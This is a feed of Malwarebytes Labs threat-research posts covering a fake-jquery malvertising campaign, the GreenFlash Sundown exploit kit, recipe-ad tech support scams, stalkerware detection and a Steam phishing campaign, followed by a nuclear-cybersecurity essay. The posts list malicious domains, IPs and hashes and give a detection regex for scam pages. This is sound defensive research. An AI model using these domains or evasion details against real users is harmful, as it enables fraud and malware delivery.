Techie Feeds

Fake jquery campaign leads to malvertising and ad fraud schemes

Malwarebytes - Thu, 06/27/2019 - 16:14

Recently we became aware of new domains used by an old malware campaign known as ‘fake jquery’, previously documented by web security firm Sucuri. Thousands of compromised websites are injected with a reference to an external JavaScript called jquery.js.

However, there is something quite elusive about this campaign with regards to its payload. Indeed, to many researchers the supposedly malicious JavaScript is always blank.

In this blog we share how we were able to identify the purpose of the fake jquery malware infection by looking for artifacts and employing a variety of User-Agent strings and geolocations.

Unsurprisingly, we found a web of malicious redirects via malvertising campaigns with a strong focus on mobile users who are tricked into installing rogue apps. The end goal is to monetize via fullscreen adverts that pop up on your phone at regular intervals.

Looking for a clue

Our search begins by looking up some of the domains mentioned on Twitter by @Placebo52510486. There are thousands of sites listed by PublicWWW that have been injected with malicious jquery lookalikes.

While we do not know the exact infection vector, many of these websites are running an outdated Content Management System (CMS).

Like other researchers before, when we replayed traffic the supposedly malicious JavaScript was once again empty.

However, with some persistence and luck, we were able to find an archive of this script when it was not empty.

We can see that it contains a redirect to: financeleader[.]co. A cursory check on this domain confirms the host pairs corresponding to those fake jquery domains. It’s worth noting that browsing to the root domain without the special identifier will redirect to google.com.

Desktop web traffic

There is some geo-targeting involved for the redirections and clearly desktop users do not appear to be the primary focus here. From a US IP address, you are presented with a bogus site where all items point to the same link that redirect you to instantcheckmate[.]com.

Associated web traffic:

From a non US IP, you are redirected to a page that aggressively advertises VPNs:

Associated web traffic:

Mobile web traffic

Once we switch to a mobile User-Agent and Android in particular, we can see a lot more activity and a variety of redirects. For example in one case, we were served a bogus adult site that requires users to download an app in order to play the videos:

Associated web traffic:

This app is malicious (detected as Android/Trojan.HiddenAds.xt by Malwarebytes) and will generate full screen ads at regular intervals.

Traffic monetization and ad fraud

While we encountered some desktop traffic, we believe the primary goal of the fake jquery campaign is to monetize from mobile users. This would explain the level of filtering involved to hide non-qualified traffic.

We weren’t able to get an idea of the scale at play, especially considering that the domain initiating the redirects really only became active in late May. However, given the number of websites that have been compromised, this campaign is quite likely funneling a significant amount of traffic leading to ad fraud.

Malwarebytes users are protected against this campaign both on desktop and mobile.

Indicators of Compromise

Fake jquery domains:
12js[.]org
16js[.]org
22js[.]org
lib0[.]org
16lib[.]org
12lib[.]org
wp11[.]org

Redirects:
financeleader[.]co
afflink[.]org

Malicious APKs:
0e67fd9fc535e0f9cf955444d81b0e84882aa73a317d7c8b79af48d91b79ef19 a210c9960edc5362b23e0a73b92b4ce4597911b00e91e7d3ca82632485c5e68d

The post Fake jquery campaign leads to malvertising and ad fraud schemes appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GreenFlash Sundown exploit kit expands via large malvertising campaign

Malwarebytes - Wed, 06/26/2019 - 18:30

Exploit kit activity has been relatively quiet for some time, with the occasional malvertising campaign reminding us that drive-by downloads are still a threat.

However, during the past few days we noticed a spike in our telemetry for what appeared to be a new exploit kit. Upon closer inspection we realized it was actually the very elusive GreenFlash Sundown EK.

The threat actors behind it have a unique modus operandi that consists of compromising ad servers that are run by website owners. In essence, they are able to poison the ads served by the affected publisher via this unique kind of malvertising.

In this blog, we review their latest campaign responsible for pushing ransomware, Pony and a coin miner. A number of publishers have been compromised and this marks the first time we see GreenFlash Sundown EK expand widely out of Asia.

Stealthy compromise

At first, we believed the attack originated from one ad network, but we were able to pinpoint where it came from by reviewing traffic captures. One of the affected publishers is onlinevideoconverter[.]com, a popular site to convert videos from YouTube and other platforms into files. According to SimilarWeb, it drives 200 million visitors per month:

Stats over the past few months show high traffic volume

People navigating to the page to convert YouTube videos into the MP4 format will be sent to the exploit kit, but only after some very careful fingerprinting. The full redirection sequence is shown below:

Web traffic leading to the exploit kit

The redirection mechanism is cleverly hidden within a fake GIF image that actually contains a well obfuscated piece of JavaScript:

Smart way to conceal JavaScript within an image

After some painful debugging, we can see that it links to fastimage[.]site:

Debugging the JavaScript reveals the next hop in the chain

The next few sessions contain more interesting code including a file loaded from fastimage[.]site/uptime.js which is actually a Flash object.

Another fancy method of performing a covert redirect

This performs the redirection to adsfast[.]site which we recognize as being part of the GreenFlash Sundown exploit kit. It uses a Flash Exploit to deliver its encoded payload via PowerShell:

Leveraging PowerShell is interesting because it allows to do some pre-checks before deciding to drop the payload or not. For example, in this case it will check that the environment is not a Virtual Machine. If the environment is acceptable, it will deliver a very visible payload in SEON ransomware:

SEON’s ransomware note

The ransomware uses a batch script to perform some of its duties, such as deleting shadow copies:

Batch helper to delete backups

GreenFlash Sundown EK will also drop Pony and a coin miner while victims struggle to decide the best course of action in order to recover their files.

Wider campaign

Our previous encounters with GreenFlash Sundown EK, for example during our winter 2019 exploit kits review, were always limited to South Korea. However, based on our telemetry this campaign is active in North America and Europe, which is an interesting departure for this threat group.

Telemetry stats showing where we found GreenFlash Sundown most active

Malwarebytes users were already protected against these drive-by attacks and we have informed the publisher about the compromise so that they can take action.

Indicators of Compromise

GreenFlash Sundown infrastructure:
hxxps[://]fastimage[.]site/
hxxp[://]adsfast[.]site/
hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/
104.248.42[.]143
172.105.66[.]231
198.211.126[.]118

Seon ransomware:
a89591555b9acb65353c2b854e582bc41db2fbc0eda2210b89a877d1862084df
591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b

Pony:
c772bdf4bd05ab63d90f4399e97a1d7eec2891c221739e3b843f9a8c9eddf4d3
9ff00b46b949bd76923137c0b0ed3cd4e252d6e88a55e9b4798525fa40164850

Coin miner:
58002d0b8acd1a539503d8ea02ff398e7ad079e0b856087f0ca30d767588be4e

[Update: 2019-06-28] Joseph Chen from Trend Micro has blogged about the return of this campaign called ShadowGate.

The post GreenFlash Sundown exploit kit expands via large malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Recipe for success: tech support scammers zero in via paid search

Malwarebytes - Tue, 06/25/2019 - 15:00

Tech support scammers are known for engaging in a game of whack-a-mole with defenders. Case in point, last month there were reports that crooks had invaded Microsoft Azure Cloud Services to host fake warning pages, also known as browser lockers. In this blog, we take a look at one of the top campaigns that is responsible for driving traffic to those Azure-hosted scareware pages.

We discovered that the scammers have been buying ads displayed on major Internet portals to target an older demographic. Indeed, they were using paid search results to drive traffic towards decoy blogs that would redirect victims to a browlock page.

This scheme has actually been going on for months and has intensified recently, all the while keeping the same modus operandi. Although not overly sophisticated, the threat actors behind it have been able to abuse major ad platforms and hosting providers for several months.

Leveraging paid search results

Tech support scams are typically distributed via malvertising campaigns. Cheap adult traffic is usually first on the list for many groups of scammers. Not only is it cost effective, but it also plays into the psychology of users believing they got infected after visiting a dodgy website.

Other times, we see scammers actively targeting brands by trying to impersonate them. The idea is to reel in victims looking for support with a particular product or service. However, in this particular campaign, the crooks are targeting folks looking up food recipes.

There are two types of results from a search engine results page (SERP):

  • Organic search results that match the user’s search query based on relevance. The top listed sites are usually those that have the best Search Engine Optimization (SEO).
  • Paid search results, which are basically ads relevant to the user’s query. They require a certain budget where not all keywords are equal in cost.

Because paid search results are typically displayed at the top (often blending in with organic search results), they tend to generate more clicks.

We searched for various recipes on several different web portals (CenturyLink, Att.net, Yahoo! search and xfinity) and were able to easily find the ads bought by the scammers.

We do not have exact metrics on how many people clicked on those ads but we can infer that this campaign drew a significant amount of traffic based on two indicators: the first being our own telemetry and the second from a URL shortener used by one of the websites:

While those ads look typical and actually match our keyword search quite well, they actually redirect to websites created with malicious intent.

Decoy websites

To support their scheme, the scammers have created a number of food-related blogs. The content appears to be genuine, and there are even some comments on many of the articles.

However, upon closer inspection, we can see that those sites have basically taken content from various web developer sites offering paid or free HTML templates. “<!– Mirrored from…” is an artifact left by the HTTrack website copier tool. Incidentally, this kind of mirroring is something we often witness when it comes to browser locker pages that have been copied from other sites.

During our testing, visiting those sites directly did not create any malicious redirection, and they seemed to be absolutely benign. With only circumstantial evidence and without the so-called smoking gun, a case could not be made just yet.

Full infection chain

After some trial and error that included swapping various User-Agent strings and avoiding using commercial VPNs, we eventually were able to replay a full infection chain, from the original advert to the browser locker page.

The blog’s URL is actually called three consecutive times, and the last one performs a POST request with the eventual conditional redirect to the browlock. In the screenshot below, you can see the difference between proper cloaking (no malicious behavior) and the redirect to a browlock page:

Browlock page

The fake warning page is fairly standard. It checks for the type of browser and operating system in order to display the appropriate template to Windows and Mac OS victims.

The scammers often register entire ranges of hostnames on Azure by iterating through numbers attached to random strings. While many of those pages are taken down quickly, new ones are constantly popping back up in order to keep the campaign running. Here are some URI patterns we observed:

10-server[.]azurewebsites[.]net/call-now1/
2securityxew-561error[.]azurewebsites[.]net/Call-Now1/
10serverloadingfailed-hgdfc777error[.]azurewebsites[.]net/chx/
11iohhwefuown[.]azurewebsites[.]net/Call-Support1/
11serversecurityjunkfile-65error[.]azurewebsites[.]net/Call-Mac-Support/
2serverdatacrash-de-12error[.]azurewebsites[.]net/macx/
2systemservertemporaryblockghjj-510error[.]azurewebsites[.]net/mac-support/

We believe the crooks may also be rotating the decoy site that performs the redirect in addition to the existing user filtering in order to evade detection from security scanners.

Finding the perpetrators

We do not condone interacting with scammers directly, but part of this investigation was about finding who was behind this campaign in order to take action and spare more victims.

To continue on with deception, the rogue technicians lied to us about the state of our computer and made up imaginary threats. The goal was to sell expensive support packages that actually add little value.

The company selling those services is A2Z Cleaner Pro (AKA Coretel Communications) and was previously identified by one victim in August 2018 in a blog comment on the FTC’s website.

Their webste is hosted at 198.57.219.8, where we found two other interesting artifacts. The first one is a company named CoreTel that is also used by the scammers as a kind of business entity. It appears to be a rip off from another domain that pre-existed by several years and also hosted on the same IP adddress:

And then, there are two new recipe sites that were both registered in June and, as with previous ones, they also use content copied from other places:

Mitigation and take down

Malwarebytes’ browser extension was already blocking the various browlock pages heuristically.

We immediately reported the fraudulent ads to Google and Microsoft (Bing), as well as the decoy blogs to GoDaddy. The majority of their domains have been taken down already and their ad campaigns banned.

This tech support scam campaign cleverly targeted an older segment of the population by using paid search results for food recipes via online portals used by many Internet Service Providers.

There is no doubt scammers will continue to abuse ad platforms and hosting providers to carry out their business. However, industry cooperation for takedowns can set them back and save thousands of victims from being defrauded.

Indicators of compromise

Decoy blogs

alhotcake[.]com
bestrecipesus[.]com
cheforrecipes[.]com
chilly-recipesfood[.]com
cookwellrecipes[.]com
dezirerecipes[.]com
dinnerplusrecipes[.]com

dinnerrecipiesforu.com
handmaderecipies[.]com
homecookedrecipe[.]com
hotandsweetrecipe[.]com
just-freshrecipes[.]com
lunch-recipesstore[.]com
mexirecipes[.]com
neelamrecipes[.]com
nidhikitchenrecipes[.]com
organicrecipesandfood[.]com
recipes4store[.]com
recipestores[.]com
royalwarerecipes[.]com
smokyrecipe[.]com
specialsweetrecipes[.]com
starcooking[.]club

starrecipies[.]com
sweethomemadefoods[.]com
tatesty-recipes[.]com
today4recipes[.]com
tophighrecipes[.]com
toptipsknowledge[.]com
totalspicyrecipes[.]com
vegfood-recipes[.]com
yammy-recipes[.]com

handmaderecipies[.]com
homecookedrecipe[.]com
hotandsweetrecipe[.]com
just-freshrecipes[.]com
lunch-recipesstore[.]com
mexirecipes[.]com
neelamrecipes[.]com
nidhikitchenrecipes[.]com
organicrecipesandfood[.]com
recipes4store[.]com
recipestores[.]com
royalwarerecipes[.]com
smokyrecipe[.]com
specialsweetrecipes[.]com
starcooking[.]club

starrecipies[.]com
sweethomemadefoods[.]com
tatesty-recipes[.]com
today4recipes[.]com
tophighrecipes[.]com
toptipsknowledge[.]com
totalspicyrecipes[.]com
vegfood-recipes[.]com
yammy-recipes[.]com

healthycookingidea[.]com
recipesstudios[.]com

a2zpcprotection[.]com
a2zcleanerpro[.]com

Regex to match browlock URIs on Azure

^http(s|):\/\/(?!www)^.{2}[a-z]{2,7}\/([cC]all-([nN]ow|Support)1|chx|macx|(Call-)?[mM]ac-[sS]upport)

The post Recipe for success: tech support scammers zero in via paid search appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (June 17 – 23)

Malwarebytes - Mon, 06/24/2019 - 16:29

Last week on the Malwarebytes Labs blog, we took a look at the growing pains of smart cities, took a deep dive into AI, jammed along to Radiohead, and looked at the lessons learned from Chernobyl in relation to critical infrastructure. We also explored a new Steam phish attack, and pulled apart a Mac cryptominer.

Other cybersecurity news
  • Florida City falls to ransomware: Riviera Beach City Council agrees to pay $600,000 to regain use of hijacked computers. (Source: Forbes)
  • Smart TV virus warning goes AWOL: A peculiar promotional message warning about the  dangers posed to smart TVs goes missing. But why? (Source: The Register)
  • Used Nest cams allow continued cam access: This has been fixed, but read on for a look at what happens in the realm of IoT when old devices connect in ways you’d rather they didn’t. (Source: Wirecutter)
  • Fake profiles on LinkedIn go spying: An interesting tale of scammers making use of AI-generated profile pictures to make their bogus accounts look a little more believable. (source: Naked Security)
  • Bella Thorne takes fight to extortionists: The actress decided to share stolen photographs of herself to teach a hacker a lesson. (source: Hollywood Reporter)
  • This phish is a fan of encryption: A new scam claims an encrypted message is waiting, but you need to log in to view it. (Source: Bleeping Computer)
  • Mobile app concerns: High risk vulnerabilities abound in both iOS and Android apps. (Source: Help Net Security)
  • Twitter takes on state sponsored accounts: The social media platform took down around 5,000 accounts being used to push propaganda. (Source: Infosecurity Magazine)
  • Malware comes gunning for Google 2FA: A new attack tries its best to bypass additional security restrictions. (Source: We Live Security)
  • A security hole in one: Mobile malware attempts to swipe numerous pieces of personal information. (Source: SC Magazine)

Stay safe, everyone!

The post A week in security (June 17 – 23) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile stalkerware: a long history of detection

Malwarebytes - Mon, 06/24/2019 - 15:00

Recently, we have received an alarming question from many Malwarebytes users, asking, “Do you detect stalkerware?” The answer is an overwhelming, “Absolutely, and for good reason!” Moreover, we have been doing so for a long time, and are expanding our efforts in the months to come.

Going back more than five years, Malwarebytes researchers have detected applications and software that monitor other people’s online behavior and physical whereabouts. Our firm belief then is what we hold to be true now: People who are being watched have a right to know. And, taking that a step further, people should be able to consciously choose which applications and software are on their machines.

It’s your device, your choice. But when it comes to stalkerware, we know it’s not as simple as that—especially for victims of domestic abuse. So that’s why we launched a concerted effort to build a more comprehensive list of stalkerware and block it via Malwarebytes for Android, as well as Malwarebytes for Mac and Windows. (Malwarebytes for iOS no longer has scanning capabilities because of Apple constraints.)

Over the last month, we analyzed more than 2,500 samples of programs that had been flagged in research algorithms as potential monitoring/tracking apps, spyware, or stalkerware. Our database of known stalkerware has now increased to include 100 applications that no one else detects, including seven that are, as of presstime, still on Google Play.

In addition, we’ve partnered with local shelters, nonprofit groups, and law enforcement, as well as other security professionals, to share intel and build awareness. Our aim is to protect domestic abuse victims on and off their devices. Stay tuned for more blogs with advice on what to do if you find stalkerware on your phone, and how parents and other individuals can determine if a monitoring app is safe to use.

What is stalkerware?

The term stalkerware can be applied to any application that can be used to stalk/spy on someone else. Stalkerware is often marketed as a legitimate mobile tracking program to keep tabs on loved ones, especially children. Some of these programs are used above board by families keeping a close eye on their kids’ devices or users looking to find lost phones/laptops. However, these programs are often misused—to the detriment of their victims—who can now be found wherever they are going, even if they are trying to get away from abusive partners or other dangerous individuals.

What can stalkerware do?

To get to what stalkerware can do, let’s first look at the longtime mobile threat category monitor, which is a subset of potentially unwanted programs (PUPs). Because some of these stalkerware applications can be used legitimately, they are currently flagged as programs users might not potentially want on their phones. However, once presented with what stalkerware can do (or once gaining knowledge of a program that’s been installed on their device without consent), many users will likely want to delete these apps.

To see how scary a monitoring app can be, for example, I invite you to read Mobile Menace Monday: beware of monitoring apps. To highlight, here is a list of information a monitoring app/stalkerware can gather— all of which can be sent to a remote user.

  • GPS location
  • Pictures taken with front/rear camera (unbeknownst to user)
  • SMS messages
  • Call history
  • Browser history
  • Recorded audio via device mic
  • Email accounts stored on device
  • Phone numbers in contact list
  • IP address of device
A monitoring app can pinpoint a device’s exact location.

Even scarier, some of these apps are easily available on Google Play. More on that later.

A step further

Outside of Google Play, there lives a malevolent class of malware known as spyware. It has all the features of monitoring apps along with even more information-gathering capabilities. This information is readily available to stalkers with real-time data on every step of their victims. In addition, spyware can be uploaded and remain undetected, stealthily hiding its presence deep within mobile or desktop devices. 

However, stalkerware can achieve much the same results as spyware, and it’s more readily available on the market. These applications represent real-life threats to domestic abuse victims, who can readily be tracked down (along with their children), even when hidden in shelters.

In expanding our efforts to block stalkerware, we are working side-by-side with shelters, non-profit organizations, other AV vendors, and law enforcement agencies to collect as many samples of stalkerware as we can, and train victims on what to do if they suspect they are being tracked. This is a matter of personal security for victims, and we take their safety seriously.

Hard stance on monitoring apps

There is a small set of monitoring apps actively available on Google Play.  These apps advertise themselves as helping hands for finding lost or stolen mobile devices, or for keeping track of younger children in the family. 

Admittedly, there is an argument that these apps can indeed be helpful in both of those cases. Nevertheless, the potential to have the same appalling outcome as spyware exists. For this reason, we aggressively detect monitoring apps, even if they are in Google Play.

If users have knowingly and willingly downloaded monitoring apps to their own devices, they needn’t delete them when we detect them. Directions on how to keep a program that you know and trust that we’ve flagged are here for Windows users. For Android users:

  1. Run a scan.
  2. On the results screen, below each checkbox is drop-down arrow. Click on the arrow.
  3. From the list of options, select “Ignore Always.” Future scans will no longer detect the app as suspicious.
Call to action

Historically, apps that fall under the stalkerware umbrella have been extremely difficult to track down. That’s why we are calling on our patrons to help! Please reach out if you or someone you know suspects an app can be used to stalk its victims—and especially let us know if Malwarebytes for Android does not currently detect that app. You can do so via our Malwarebytes Support Forum or by submitting a ticket with Malwarebytes support.

In addition, look out for our next article on stalkerware that aims to provide victims with guidance on how to tell if their device has stalkerware installed, and what to do if that’s the case.

Dedicated to protecting you

It is a haunting reality that technology can be used for abusive purposes, especially those with horrifying physical outcomes. With most malware, some far-off threat actor is making a profit off of strangers by selling their data, zapping their CPU, or scamming them into handing over a few hundred dollars. Although dirty, no one is physically harmed.

With stalkerware, there is a real-life threat with dire consequences.

There is no more important task for a cybersecurity company than to protect its users from harm—and stalkerware opens the door to the worst form of it. This is a pursuit that all of us on at Malwarebytes take on with upmost gravitas. We hope you will join us in the fight.

Stay safe out there!

The post Mobile stalkerware: a long history of detection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fresh “video games” site welcomes new users with Steam phish

Malwarebytes - Fri, 06/21/2019 - 16:51

Over the weekend, I received this unsolicited message from an acquaintance on Steam:

1 free game for new users!
Take the game you want https://t.co/{redacted}

Fortunately, other friends on Steam were quick to publicly warn others about potentially hacked accounts spamming dubious messages to anyone (if not all) in their network. I was reading these warnings hours before receiving a sample of the spam message to my own account.

A shallow online search reveals that this campaign has been going on since mid-March of this year. Because it’s quite low-profile, not a lot were able to dig deeper into it. We’ll attempt to do that here.

Latest Steam phishing campaign: a walk-through

Steam users were right to point out that this shortened URL indeed redirects to a phishing domain—but not at once.

Clicking the t.co link, which is a Twitter shortened URL, in the chat takes users to the site behind it: steamredirect[dot]fun. This is the re-director domain that takes users to the “proper” phishing page, which pretends to be a site where one can win free games.

Screenshot of the site called Gift4Keys, just one of the many identical websites out there that the shortened URL points users to.

In the middle of the site is the “Try your luck” section, a roulette game where users can get their (supposed) free game. All they have to do is press the blue Play button.

Whoo! I won PUBG!

The page then shows to the user that they have less than 30 minutes to claim the complete key by logging into their Steam account via the website. At the same time, the page also shows that the user would need to wait for 24 hours before they can roll the roulette again and get another free game.

Clicking the Login via Steam button here—or at the upper right-hand corner of the site—opens a page that looks like the bog-standard unaffiliated third-party Steam login page. This is either as a pop-up window or a new tab. The site did both during several tests.

The fake Steam login

Here are a few reasons why, at this point, Steam users should start considering bailing from this site all together and not hand over their credentials:

  • The links on the page, such as “Profile Privacy Setting” and “create an account” don’t work.
  • The URL address bar is blank. Legitimate unaffiliated third-party sites display an EV certificate for Valve Corp, and the URL in the address bar says that the signing in takes place in steamcommunity.com.
  • The Language drop-down box at the upper right-hand corner doesn’t work. It also appears to be in Russian even when visitors are outside of Russia.

Supplying credentials to this phish page, as we know, will result in accounts getting hijacked to further proliferate the phishing links.

Links in identical campaigns in the past were not hidden behind a URL shortener. It’s also no surprise that these links kept changing. In this case, the shortened URLs have redirected to the following domains, which are less than four months old, at some point:

  • easyk3y[dot]com
  • ezzkeys[dot]com
  • g4meroll[dot]com
  • g4me5[dot]com
  • gift4keys[dot]com
  • gifts-key[dot]com
  • ong4me[dot]com
  • tf2details[dot]com
  • yes-key[dot]com

Be forewarned that a number of these sites are still online, and if you visit them, they all look like this:

As of this writing, the only way to access the actual “free games roulette” page we have been showing above is by appending certain strings at the end of the URLs. That’s probably a good thing.

Keep calm and be vigilant

Steam has always been the platform of choice of fraudsters for a long time because of its millions of active users. This isn’t the first time that users have met and reacted to such a phishing campaign. In fact, this latest one has all the telltale signs of previous campaigns: Steam friend sends a message with link out of nowhere, link leads to a fake Steam login page, collected Steam credentials are used to hijack accounts and spam their friends.

Yes, there are still Steam users falling for old tricks. Yet, it’s also good to see Steam users realizing the danger early on, giving their friends a heads-up about it, and, should they suspect that they are affected, try to contain their zombified accounts to prevent other users from getting compromised.

So be calm, keep on the lookout, stay informed, and continue to look after each other.

Stay safe!

Other related blog(s):

The post Fresh “video games” site welcomes new users with Steam phish appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Chernobyl’s lessons for critical-infrastructure cybersecurity

Malwarebytes - Fri, 06/21/2019 - 15:30

This story originally ran on The Parallax on April 26, 2019.

CHERNOBYL EXCLUSION ZONE, Ukraine—The stray dog looking directly at me was hard to resist. Her ears perked up, her fur appeared clean—free of mange, at any rate—and she held a large stick firmly between her jaws.

She looked like a good dog. She wanted to be petted or, at least, have someone wrestle the stick from her—perhaps throw it so she could retrieve it. But because we met near Cafe Desyatka, in the woods of the Chernobyl Exclusion Zone, a 1,004-square-mile region slightly smaller than Yosemite National Park that surrounds the Chernobyl Nuclear Power Plant, looking but not touching was probably the safer choice. I was less worried about how irradiated she might be than about whether she had rabies.

According to a 2017 estimate by the United States–based nonprofit Clean Futures Fund, this dog was one of hundreds of strays living in the Exclusion Zone, near the power plant, and in the abandoned cities of Chernobyl and Pripyat, which once housed the nuclear facility’s employees. The organization offers aid to communities decimated by industrial accidents, and that includes caring for the Chernobyl dogs, many of whom die young due to malnourishment, disease, predators, harsh weather, a lack of shelter, and Chernobyl’s notorious environmental contamination.

Soviet soldiers forced the owners of the dogs’ ancestors to abandon them in the evacuation that followed the Chernobyl disaster, which began 33 years ago today. Chernobyl, the first nuclear-power plant in the Soviet Union, had been operational for nine years. At 1:23 a.m. on April 26, 1986, a series of facility tests initiated the prior day culminated in the fuel chamber getting overpressurized.

During the tests, which were designed to determine how long the turbines would spin after a loss of electricity, an operator decided to carry on with testing procedures amid signs that the reactor was malfunctioning. Two explosions, driven by super-heated steam, followed. And smoke from fires spread radioactive material—400 times the amount released at Hiroshima—far beyond Chernobyl.

Two Chernobyl workers were immediately killed by explosions. Three more died the following week, and by the end of July, radiation exposure had killed 28 people, including six firefighters, according to the World Nuclear Association’s assessment of the Chernobyl disaster, last updated in April 2018. At least 106 others received doses of radiation high enough to contract acute radiation sickness.

This was not the first disaster at Chernobyl: A partial meltdown of Chernobyl Reactor 1’s core occurred in 1982, but the event and its impact were concealed from the public.

The official Soviet response was to blame the disaster on facility workers who bungled the tests. This conclusion was supported by the International Atomic Energy Association in 1992. But Chernobyl’s deputy chief engineer, Anatoly Stepanovich Dyatlov, alleged in a 1992 interview that flaws in the reactor design were the root cause.

One of the hundreds of stray dogs living in the Chernobyl Exclusion Zone, descendants of the original pets which Soviet soldiers forced Chernobyl residents to abandon in the aftermath of the disaster. Photo by Seth Rosenblatt/The Parallax

Dyatlov’s judgment is supported by a 2002 report for the National Academy of Sciences of Belarus, which investigated the reactor design and how it led to the disaster. It is also supported by a 2009 analysis by the World Nuclear Association:

“The accident at Chernobyl was the product of a lack of safety culture. The reactor design was poor, from the point of view of safety, and unforgiving for the operators, both of which provoked a dangerous operating state. The operators were not informed of this and were not aware that the test performed could have brought the reactor into an explosive condition. In addition, they did not comply with operational procedures. The combination of these factors provoked a nuclear accident of maximum severity in which the reactor was totally destroyed within a few seconds.”

Multiple human factors led to the disaster at Chernobyl, from the Soviet decision to use the flawed reactor system when building the facility in the 1970s to the operators’ actions that fateful hour in 1986. And experts believe that human errors, including a reliance on overly connected or outdated systems to monitor and run critical infrastructure, could be exploited to pose similar threats to today’s nuclear-power facilities.

It remains an open question whether the industry’s collective responses are enough to stave off even the most clever of nation-state cyberattacks. What’s clear is that cyberattacks against all critical-infrastructure operations are on the rise, and nuclear-power facilities are not exempt, according to a 2016 report by the nuclear-security nonprofit Nuclear Threat Initiative.

Heavy regulations in the nuclear-power industry extending to cybersecurity protocol make nuclear-power facilities more secure than other types of power facilities, cybersecurity experts say. The regulations, in part, stem from education about Chernobyl. But cyberattacks against US nuclear-power facilities in the 2000s helped push regulators to take a more active role.

Early lessons from the school of cyber-knocks

In 2003, the computer worm SQL Slammer tackled more than 75,000 computers around the globe in 10 minutes, including those at the Davis-Besse nuclear-power plant in Ohio. Slammer prevented employees from accessing the software needed to monitor system safety for about five hours.

Thanks to a computer backup system, combined with the reactor being offline for unrelated reasons, the Slammer attack didn’t result in any damage. Instead, says Michael Toecker, the founder of cybersecurity consultancy Context Industrial Security, “the industry took it as a wake-up call…Everybody in nuclear turned their heads and said, ‘What just happened?’”

There were at least two other cybersecurity incidents at US nuclear-power plants that decade—in 2006, at the Browns Ferry Nuclear Power Plant in Alabama, and in 2008, at the Hatch Nuclear Power Plant in Georgia—before the US Nuclear Regulatory Commission mandated that all nuclear-power facilities have a cybersecurity plan in 2009.

A year later, the NRC introduced the Regulatory Guide 5.71, a series of “best practices” it developed with input from the Department of Homeland Security, the Institute of Electrical and Electronics Engineers, the International Society of Automation, the National Institute of Standards and Technology, and the Nuclear Energy Institute. Each plant’s plan must hit eight milestones, which include creating a cybersecurity assessment team; identifying different cybersecurity levels and figuring out which devices need to be on each level; and protecting devices from portable media like thumb drives.

Threats such as Slammer “are probably equivalent” in scope to those at non-nuclear facilities, says F. Mitch McCrory, an internationally recognized cybersecurity expert who currently manages the Risk and Reliability Analysis Department in Sandia National Laboratories’ Energy, Earth, and Complex Systems Center. All power plants must be concerned with cyberattacks such as insider threats, software and hardware supply chain attacks, and hackers remotely accessing the network. But considering a disaster like Chernobyl, he says, nuclear-facility operators must “do cybersecurity better than other places.”

Layered security to stop hackers

In his 1990 book on nuclear energy, Bernard Leonard Cohen, a professor emeritus of physics at the University of Pittsburgh, wrote that “post-accident analyses indicate that if there had been a US-style containment in the Chernobyl plant, none of the radioactivity would have escaped, and there would have been no injuries or deaths.”

That was before critical-infrastructure hacks became common. Stricter regulations on US nuclear-power facilities implemented since then include a requirement that the networks connecting nuclear-power machinery be separate from the business side of the facility. Nuclear facilities are also required to use one-way data diodes to control the flow of information from monitoring devices to central computers controlling the plant.

Bumper cars that were part of the amusement park in the now-abandoned town of Pripyat, Ukraine, home to more than 49,000 people when it was fully evacuated following the disaster. Photo by Seth Rosenblatt/The Parallax

“Digital instrumentation diodes prevent communication from the business network into the control system network. It mostly removes the threat vector of trying to hack into the system through the business network,” McCrory says, because there’s no way to send data back to its source—which is possible over traditionally used copper wiring. “And control system networks have digital-asset monitoring, to scan all devices for malware.”

There are procedural protections in place as well, Toecker says. Hardware and software updates must be tested on remote systems. Any software code written by a nuclear engineer for a nuclear facility must be reviewed by other engineers who have no relationship to the author. Software from an outside vendor must go through a source verification process, which can involve a hash check or software signature check, depending on the kind of software. Update installations must be documented. And depending on the type of update or the status of the facility, other precautionary procedures might come into play.

“We started doing in 2012,” Toecker says. “The rest of the power industry is only getting to that now.”

Cybersecurity holes still remain

Even after taking every imaginable precaution, no computerized system is ever hack-proof, and there is still plenty for the nuclear-power industry to improve on, says Bryan Owen, cybersecurity manager at enterprise data management software maker OSIsoft, whose software is used by nuclear facilities across the world to manage streams of monitoring data.

Top on his list is exporting US standards to other countries, not all of which have such strict regulations in place. In the United States, “regulators, standards organizations, government departments, customers, partners—they all rolled up their sleeves for years to develop the nuclear-cybersecurity regulations,” he says. “OSIsoft has almost 50 percent market share globally, and I’ve visited facilities all over the world. But I haven’t seen this replicated.”

Owen would also like available data on “near-misses,” when something goes wrong but doesn’t result in a significantly notable event. “This has proven to be a constructive approach in aviation safety,” he says, but remains “elusive” for critical infrastructure.

A hidden Soviet Duga array, an over-the-horizon radar system for detecting missile attacks, was revealed to the public in the aftermath of the Chernobyl nuclear disaster. Photo by Seth Rosenblatt/The Parallax

Nuclear-power facilities across the world also must contend with issues related to aging: Equipment can easily last “12 to 15 years,” Toecker says, but older equipment connected to networks can be harder to protect, as vendors discontinue product lines or go out of business.

In his 2016 report on cybersecurity and nuclear-power facilities, engineering and automation specialist Béla Lipták lays out the challenges in getting facility operators to protect customers.

“We also know that for financial reasons, and because of management convenience, the whole nuclear industry is drifting toward installing completely digital controls to allow the remote operation of some plant functions,” he writes. To protect consumers from hackers disrupting plant operations, he says the NRC must mandate “totally separating the corporate business networks from the plant networks, and to realize that digital firewalls do not guarantee this separation.”

That last bit of guidance is not clearly stated in US regulations of nuclear-power plants. And although data diodes may isolate the sensors that measure the plant’s functions from the plant’s operations network, industrial control system cybersecurity expert Joe Weiss says regulations should specify that sensors have on-board cybersecurity protections to stop data manipulation at the source. In most cases, he says, they don’t.

“If you can’t trust what you measure, you’re in pretty sad shape,” Weiss says. “If the sensor has remote communication capability, whether wired or wireless, it can be vulnerable. We made our systems accessible without truly understanding what that meant.”

Sensor vulnerability strikes at the core of Weiss’ concerns about nuclear power plant safety, especially as overwhelmed sensors made the Three Mile Island incident in 1979 much harder to stop.

“If what you’re measuring is not correct, your actions based on that are not going to be correct. If you’re a doctor, and you can’t trust your temperature or blood pressure reading, how can you make a good diagnosis?” he asks. “When you talk about sensors, that’s the heart of safety.”

High cost of failure

